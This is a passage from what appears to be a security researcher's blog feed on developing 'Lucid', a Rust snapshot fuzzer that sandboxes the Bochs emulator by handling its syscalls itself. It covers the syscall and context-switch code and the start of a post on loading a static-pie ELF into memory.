        <span class="mi">0x14</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">//println!("Handling writev()...");</span>
            <span class="c1">// Get the fd</span>
            <span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">arg1</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>

            <span class="c1">// Make sure it's an fd we handle</span>
            <span class="k">if</span> <span class="n">fd</span> <span class="o">!=</span> <span class="n">STDOUT</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Unhandled writev fd: {}"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
            <span class="p">}</span>

            <span class="c1">// An accumulator that we return</span>
            <span class="k">let</span> <span class="k">mut</span> <span class="n">bytes_written</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

            <span class="c1">// Get the iovec count</span>
            <span class="k">let</span> <span class="n">iovcnt</span> <span class="o">=</span> <span class="n">arg3</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>

            <span class="c1">// Get the pointer to the iovec</span>
            <span class="k">let</span> <span class="k">mut</span> <span class="n">iovec_p</span> <span class="o">=</span> <span class="n">arg2</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nn">libc</span><span class="p">::</span><span class="n">iovec</span><span class="p">;</span>

            <span class="c1">// If the pointer was NULL, just return error</span>
            <span class="k">if</span> <span class="n">iovec_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="nn">usize</span><span class="p">::</span><span class="n">MAX</span><span class="p">;</span>
                <span class="k">return</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// Iterate through the iovecs and write the contents</span>
            <span class="nd">green!</span><span class="p">();</span>
            <span class="k">for</span> <span class="n">_</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">iovcnt</span> <span class="p">{</span>
                <span class="n">bytes_written</span> <span class="o">+=</span> <span class="nf">write_iovec</span><span class="p">(</span><span class="n">iovec_p</span><span class="p">);</span>

                <span class="c1">// Advance iovec_p by exactly one entry per iteration</span>
                <span class="n">iovec_p</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="n">iovec_p</span><span class="nf">.offset</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">};</span>
            <span class="p">}</span>
            <span class="nd">clear!</span><span class="p">();</span>

            <span class="c1">// Update return value</span>
            <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="n">bytes_written</span><span class="p">;</span>
        <span class="p">},</span>
        <span class="c1">// nanosleep</span>
        <span class="mi">0x23</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">//println!("Handling nanosleep()...");</span>
            <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="p">},</span>
        <span class="c1">// set_tid_address</span>
        <span class="mi">0xDA</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">//println!("Handling set_tid_address()...");</span>
            <span class="c1">// Just return Bochs' pid, no need to do anything</span>
            <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="n">BOCHS_PID</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">;</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="nd">println!</span><span class="p">(</span><span class="s">"Unhandled Syscall Number: 0x{:X}"</span><span class="p">,</span> <span class="n">syscall_no</span><span class="p">);</span>
            <span class="nf">fatal_exit</span><span class="p">();</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
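
<p>The <code class="language-plaintext highlighter-rouge">writev</code> arm above boils down to walking an array of iovec entries one element at a time. Here is a minimal, standalone sketch of that walk, not Lucid’s actual code: <code class="language-plaintext highlighter-rouge">IoVec</code> and <code class="language-plaintext highlighter-rouge">gather_iovecs</code> are hypothetical names, <code class="language-plaintext highlighter-rouge">IoVec</code> stands in for <code class="language-plaintext highlighter-rouge">libc::iovec</code> so no external crate is needed, and the bytes are collected into a <code class="language-plaintext highlighter-rouge">Vec</code> instead of being printed.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use std::slice;

// Hypothetical stand-in for `libc::iovec`, so the sketch needs no external crates
#[repr(C)]
struct IoVec {
    iov_base: *const u8,
    iov_len: usize,
}

// Collect the bytes described by `iovcnt` entries starting at `iovec_p`.
//
// Safety: `iovec_p` must be NULL or point to `iovcnt` valid entries, and every
// non-empty entry must describe readable memory.
unsafe fn gather_iovecs(iovec_p: *const IoVec, iovcnt: usize) -&gt; Vec&lt;u8&gt; {
    let mut out = Vec::new();

    // Mirror the handler: a NULL array pointer yields nothing
    if iovec_p.is_null() {
        return out;
    }

    // View the raw array as a slice, so each entry is visited exactly once
    let iovecs = unsafe { slice::from_raw_parts(iovec_p, iovcnt) };
    for iov in iovecs {
        if iov.iov_base.is_null() || iov.iov_len == 0 {
            continue;
        }
        let data = unsafe { slice::from_raw_parts(iov.iov_base, iov.iov_len) };
        out.extend_from_slice(data);
    }

    out
}

fn main() {
    // Three buffers that together form one logical write
    let parts: [&amp;[u8]; 3] = [b"Test ", b"alive", b"!\n"];
    let iovecs: Vec&lt;IoVec&gt; = parts
        .iter()
        .map(|p| IoVec { iov_base: p.as_ptr(), iov_len: p.len() })
        .collect();

    let bytes = unsafe { gather_iovecs(iovecs.as_ptr(), iovecs.len()) };
    assert_eq!(bytes, b"Test alive!\n");
    println!("gathered {} bytes", bytes.len());
}
</code></pre></div></div>
<p>Turning the raw pointer into a slice up front means there is no pointer arithmetic left to get wrong inside the loop.</p>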

<p>That’s about it! It’s kind of fun acting as the kernel. Right now our test program doesn’t do much, and I bet we’re going to have to figure out how to deal with things like files when using Bochs, but that’s a problem for another time. Now all there is to do, after setting the return value in <code class="language-plaintext highlighter-rouge">rax</code>, is return to the <code class="language-plaintext highlighter-rouge">exit_handler</code> stub and then back to Bochs gracefully.</p>

<h2 id="returning-gracefully">Returning Gracefully</h2>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// Restore the flags</span>
    <span class="s">"popfq"</span><span class="p">,</span>

    <span class="c1">// Restore the GPRS</span>
    <span class="s">"mov rax, [r13 + 0x0]"</span><span class="p">,</span>
    <span class="s">"mov rbx, [r13 + 0x8]"</span><span class="p">,</span>
    <span class="s">"mov rcx, [r13 + 0x10]"</span><span class="p">,</span>
    <span class="s">"mov rdx, [r13 + 0x18]"</span><span class="p">,</span>
    <span class="s">"mov rsi, [r13 + 0x20]"</span><span class="p">,</span>
    <span class="s">"mov rdi, [r13 + 0x28]"</span><span class="p">,</span>
    <span class="s">"mov rbp, [r13 + 0x30]"</span><span class="p">,</span>
    <span class="s">"mov rsp, [r13 + 0x38]"</span><span class="p">,</span>
    <span class="s">"mov r8, [r13 + 0x40]"</span><span class="p">,</span>
    <span class="s">"mov r9, [r13 + 0x48]"</span><span class="p">,</span>
    <span class="s">"mov r10, [r13 + 0x50]"</span><span class="p">,</span>
    <span class="s">"mov r11, [r13 + 0x58]"</span><span class="p">,</span>
    <span class="s">"mov r12, [r13 + 0x60]"</span><span class="p">,</span>
    <span class="s">"mov r14, [r13 + 0x70]"</span><span class="p">,</span>
    <span class="s">"mov r15, [r13 + 0x78]"</span><span class="p">,</span>

    <span class="c1">// Restore r13 last, it is the base register for every load above</span>
    <span class="s">"mov r13, [r13 + 0x68]"</span><span class="p">,</span>

    <span class="c1">// Return execution back to Bochs!</span>
    <span class="s">"ret"</span>
</code></pre></div></div>

<p>We restore the CPU flags, restore the general purpose registers, and then we simply <code class="language-plaintext highlighter-rouge">ret</code> as if we’re done with a function call. Don’t forget that we already restored the extended state within <code class="language-plaintext highlighter-rouge">lucid_context</code> before returning from that function.</p>
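
<p>The offsets in the restore stub imply a simple layout for the saved registers: sixteen 8-byte slots from <code class="language-plaintext highlighter-rouge">rax</code> at <code class="language-plaintext highlighter-rouge">0x0</code> to <code class="language-plaintext highlighter-rouge">r15</code> at <code class="language-plaintext highlighter-rouge">0x78</code>. As a rough sketch, assuming the bank is a plain <code class="language-plaintext highlighter-rouge">#[repr(C)]</code> struct of <code class="language-plaintext highlighter-rouge">usize</code> fields on a 64-bit target, the layout can be checked like this. The names <code class="language-plaintext highlighter-rouge">RegisterBank</code> and <code class="language-plaintext highlighter-rouge">offset_of_field</code> are made up for illustration, and the field order is inferred from the stub rather than taken from Lucid’s source.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Hypothetical register bank; field order inferred from the offsets in the stub.
// Assumes a 64-bit target where usize is 8 bytes.
#[repr(C)]
#[derive(Default)]
struct RegisterBank {
    rax: usize,
    rbx: usize,
    rcx: usize,
    rdx: usize,
    rsi: usize,
    rdi: usize,
    rbp: usize,
    rsp: usize,
    r8: usize,
    r9: usize,
    r10: usize,
    r11: usize,
    r12: usize,
    r13: usize,
    r14: usize,
    r15: usize,
}

// Byte offset of `field` from the start of `bank`
fn offset_of_field(bank: &amp;RegisterBank, field: &amp;usize) -&gt; usize {
    (field as *const usize as usize) - (bank as *const RegisterBank as usize)
}

fn main() {
    let bank = RegisterBank::default();

    // These must match the displacements used by the assembly stub
    assert_eq!(offset_of_field(&amp;bank, &amp;bank.rax), 0x0);
    assert_eq!(offset_of_field(&amp;bank, &amp;bank.rsp), 0x38);
    assert_eq!(offset_of_field(&amp;bank, &amp;bank.r13), 0x68);
    assert_eq!(offset_of_field(&amp;bank, &amp;bank.r15), 0x78);
    assert_eq!(std::mem::size_of::&lt;RegisterBank&gt;(), 0x80);

    println!("register bank layout matches the stub offsets");
}
</code></pre></div></div>
<p>A check like this is cheap insurance, because hand-written assembly will keep using the old displacements if the struct is ever reordered.</p>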

<h2 id="conclusion">Conclusion</h2>
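<p>And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. The output below shows the test program running under Lucid with us handling the syscalls ourselves. The final unhandled syscall, <code class="language-plaintext highlighter-rouge">0xE7</code>, is <code class="language-plaintext highlighter-rouge">exit_group</code> on x86_64, which the test program issues when it returns from <code class="language-plaintext highlighter-rouge">main</code>:</p>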
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Loading Bochs...
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Bochs mapping: 0x10000 - 0x18000
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Bochs mapping size: 0x8000
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Bochs stack: 0x7F8A50FCF000
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Bochs entry: 0x11058
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Creating Bochs execution context...
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Starting Bochs...
<span class="go">Argument count: 4
Args:
   -./bochs
   -lmfao
   -hahahah
   -yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7
</span></code></pre></div></div>

<h2 id="next-up">Next Up?</h2>
<p>Next we will compile Bochs against Musl and work on getting it to work. We’ll need to implement all of its syscalls as well as get it running a test target that we’ll want to snapshot and run over and over. So the next blogpost should be a Bochs that is syscall-sandboxed snapshotting and rerunning a hello world type target. Until then!</p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Fuzzer" /><category term="Development" /><category term="Emulator" /><category term="Bochs" /><summary type="html"><![CDATA[Introduction If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. 
In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.]]></summary></entry><entry><title type="html">Fuzzer Development 1: The Soul of a New Machine</title><link href="https://h0mbre.github.io/New_Fuzzer_Project/" rel="alternate" type="text/html" title="Fuzzer Development 1: The Soul of a New Machine" /><published>2023-11-04T00:00:00+00:00</published><updated>2023-11-04T00:00:00+00:00</updated><id>https://h0mbre.github.io/New_Fuzzer_Project</id><content type="html" xml:base="https://h0mbre.github.io/New_Fuzzer_Project/"><![CDATA[<h2 id="introduction--credit-to-gamozolabs">Introduction &amp;&amp; Credit to Gamozolabs</h2>
<p>For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer <em>some</em> utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in <a href="https://nyx-fuzz.com/">Nyx</a>. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.</p>

<p>One approach is to lobotomize the target such that you can isolate a small subset of the target that you find “interesting” and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though. In an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this “interesting” target logic. The lobotomy approach greatly reduces the amount of target state we can explore. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.</p>

<p>Another approach is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that lets us explore much more state. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the “real world”. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But I think given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.</p>

<p>And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer on top of it, I revisited the stream <a href="https://www.youtube.com/watch?v=JpU-jrFnmfE">paper review</a> that <a href="https://twitter.com/gamozolabs">gamozolabs (Brandon Falk)</a> did on the <a href="https://nyx-fuzz.com/papers/">Nyx paper</a>. It’s a great stream; the Nyx authors were present in Twitch chat, so there were some good back and forths, and the stream really highlights what an amazing utility Nyx is for fuzzing. But something <em>else</em> besides Nyx piqued my interest during the stream! Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.</p>

<p>This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:</p>
<ul>
  <li>it is relatively simple in its design,</li>
  <li>it allows for almost endless introspection utilities to be added,</li>
  <li>it lends itself well to iterative development cycles,</li>
  <li>it can scale and be used on my servers I bought for fuzzing (but haven’t used yet because I don’t have a fuzzer!),</li>
  <li>it can fuzz the Linux Kernel,</li>
  <li>it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),</li>
  <li>it is pretty unique in its design compared to open source fuzzing tools that exist,</li>
  <li>it can be designed from scratch to work well with existing flexible tooling such as LibAFL,</li>
  <li>there is no source code available anywhere publicly, so I’m free to implement it from scratch the way I see fit,</li>
  <li>it can be made to be portable, i.e., there is nothing stopping us from running this fuzzer on Windows instead of just Linux,</li>
  <li>it will allow me to do a lot of learning and low-level computing research.</li>
</ul>

<p>So all things considered, this seemed like the ideal project to implement on the blog. I reached out to Gamozo to make sure he’d be ok with it, as I didn’t want to be seen as clout chasing off of his ideas, and he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content, and we’re off to developing the fuzzer.</p>

<p>Also huge shoutout to <a href="https://twitter.com/is_eqv">@is_eqv</a> and <a href="https://twitter.com/ms_s3c">@ms_s3c</a> at least two of the Nyx authors who are always super friendly and charitable with their time/answering questions. Some great people to have around.</p>

<p>Another huge shoutout to <a href="https://twitter.com/Kharosx0">@Kharosx0</a> for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.</p>

<h2 id="misc">Misc</h2>
<p>Please let me know if you find any programming errors or have some nitpicks with the code. I’ve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven’t really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.</p>

<p>I’ve decided to name the project “Lucid” for now, as a reference to lucid dreaming, since our fuzz target is in somewhat of a dream state being executed within a simulator.</p>

<h2 id="bochs">Bochs</h2>
<p>What is Bochs? Good question. <a href="https://bochs.sourceforge.io/">Bochs</a> is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it’s a JIT-less, smaller, less complex emulation tool similar to QEMU, but with far fewer use cases and much lower performance. Instead of taking QEMU’s approach of “let’s emulate anything and everything and do it with good performance”, Bochs has taken the approach of “let’s emulate an entire x86 system 100% in software without worrying about performance for the most part”. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect many code changes or rapid development; the last release was over 2 years ago.</p>

<h2 id="fuzzer-architecture">Fuzzer Architecture</h2>
<p>This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a “fuzzer” process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target system’s simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.</p>

<p>Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our “fuzzer” process. In an effort to isolate Bochs from the user’s OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system prevents Bochs from accessing any random/randomish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as <code class="language-plaintext highlighter-rouge">CPUID</code> or something similar. I actually haven’t given much thought to the latter yet, but I have a plan for syscalls. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.</p>

<p>Secondly, it also means that the entirety of Bochs’ state will be contained within our sandbox, which should enable us to reset Bochs’ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.</p>
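
<p>To make the “state contained within our sandbox” idea concrete, here is a deliberately tiny sketch. It assumes all emulator state lives in a single buffer owned by the fuzzer, which is a simplification for illustration and not how Lucid is implemented; <code class="language-plaintext highlighter-rouge">Sandbox</code>, <code class="language-plaintext highlighter-rouge">memory</code>, <code class="language-plaintext highlighter-rouge">snapshot</code>, and <code class="language-plaintext highlighter-rouge">restore</code> are hypothetical names. The point is only that when the state is ours, a reset is a memory copy within our own process.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Hypothetical sandbox: all emulator state lives in one buffer owned by the fuzzer
struct Sandbox {
    memory: Vec&lt;u8&gt;,   // live state, mutated while the emulator runs
    snapshot: Vec&lt;u8&gt;, // pristine copy taken before fuzzing starts
}

impl Sandbox {
    // Take the snapshot once, up front
    fn new(initial: Vec&lt;u8&gt;) -&gt; Self {
        let snapshot = initial.clone();
        Sandbox { memory: initial, snapshot }
    }

    // Roll the live state back to the snapshot with a plain memory copy
    fn restore(&amp;mut self) {
        self.memory.copy_from_slice(&amp;self.snapshot);
    }
}

fn main() {
    let mut sandbox = Sandbox::new(vec![0u8; 4096]);

    // Pretend one fuzzing iteration dirtied some state
    sandbox.memory[0x10] = 0xAA;
    sandbox.memory[0xFFF] = 0x55;

    // Reset before the next iteration
    sandbox.restore();
    assert!(sandbox.memory.iter().all(|&amp;b| b == 0));
    println!("state restored");
}
</code></pre></div></div>
<p>A real implementation would want to copy back only the pages that were dirtied, but the ownership argument is the same.</p>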

<p>So in general, this is how our fuzzing setup should look:
<img src="/assets/images/pwn/FuzzingArch.PNG" alt="Fuzzer Architecture" /></p>

<p>In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, I’ve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let’s dive into how that has been accomplished thus far.</p>

<h2 id="loading-an-elf-in-memory">Loading an ELF in Memory</h2>
<p>To make loading Bochs in memory as simple as possible, I’ve chosen to compile Bochs as a <code class="language-plaintext highlighter-rouge">-static-pie</code> ELF. This means that the built ELF has no expectations about where it is loaded. In its <code class="language-plaintext highlighter-rouge">_start</code> routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will be to simply build and load a <code class="language-plaintext highlighter-rouge">-static-pie</code> test program and make sure we can do that correctly.</p>

<p>In order to make sure we have everything correctly implemented, we’ll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Argument count: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argc</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Args:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">argc</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"   -%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>

    <span class="kt">size_t</span> <span class="n">iters</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Test alive!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
        <span class="n">iters</span><span class="o">++</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">iters</span> <span class="o">&gt;</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Remember, at this point we don’t sandbox our loaded program at all, all we’re trying to do at this point is load it in our fuzzer virtual address space and jump to it and make sure the stack and everything is correctly setup. So we could run into issues that aren’t real issues if we jump straight into executing Bochs at this point.</p>

<p>So compiling the <code class="language-plaintext highlighter-rouge">test</code> program and examining it with <code class="language-plaintext highlighter-rouge">readelf -l</code>, we can see that there is actually a <code class="language-plaintext highlighter-rouge">DYNAMIC</code> segment, likely because of the relocations that need to be performed during the aforementioned <code class="language-plaintext highlighter-rouge">_start</code> routine.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">dude@lol:~/lucid$</span><span class="w"> </span>gcc test.c <span class="nt">-o</span> <span class="nb">test</span> <span class="nt">-static-pie</span>
<span class="gp">dude@lol:~/lucid$</span><span class="w"> </span>file <span class="nb">test</span>
<span class="go">test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
</span><span class="gp">dude@lol:~/lucid$</span><span class="w"> </span>readelf <span class="nt">-l</span> <span class="nb">test</span>
<span class="go">
Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
  DYNAMIC        0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
                 0x00000000000001b0 0x00000000000001b0  RW     0x8
  NOTE           0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  NOTE           0x0000000000000300 0x0000000000000300 0x0000000000000300
                 0x0000000000000044 0x0000000000000044  R      0x4
  TLS            0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000000020 0x0000000000000060  R      0x8
  GNU_PROPERTY   0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  GNU_EH_FRAME   0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
                 0x0000000000001cbc 0x0000000000001cbc  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000003220 0x0000000000003220  R      0x1

 Section to Segment mapping:
  Segment Sections...
   00     .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt 
   01     .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini 
   02     .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table 
   03     .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs 
   04     .dynamic 
   05     .note.gnu.property 
   06     .note.gnu.build-id .note.ABI-tag 
   07     .tdata .tbss 
   08     .note.gnu.property 
   09     .eh_frame_hdr 
   10     
   11     .tdata .init_array .fini_array .data.rel.ro .dynamic .got
</span></code></pre></div></div>
<p>So what portions of this ELF image do we actually care about for our loading purposes? We probably don’t need most of this information to simply get the ELF loaded and running. At first, I didn’t know what I needed so I just parsed all of the ELF headers.</p>

<p>Keeping in mind that this ELF parsing code doesn’t need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.</p>

<h2 id="elf-headers">ELF Headers</h2>
<p>I’ve written ELF parsing code before, but didn’t really remember how it worked so I had to relearn everything from Wikipedia: <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format</a>. Luckily, we’re not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Constituent parts of the Elf</span>
<span class="nd">#[derive(Debug)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">ElfHeader</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">entry</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">phoff</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
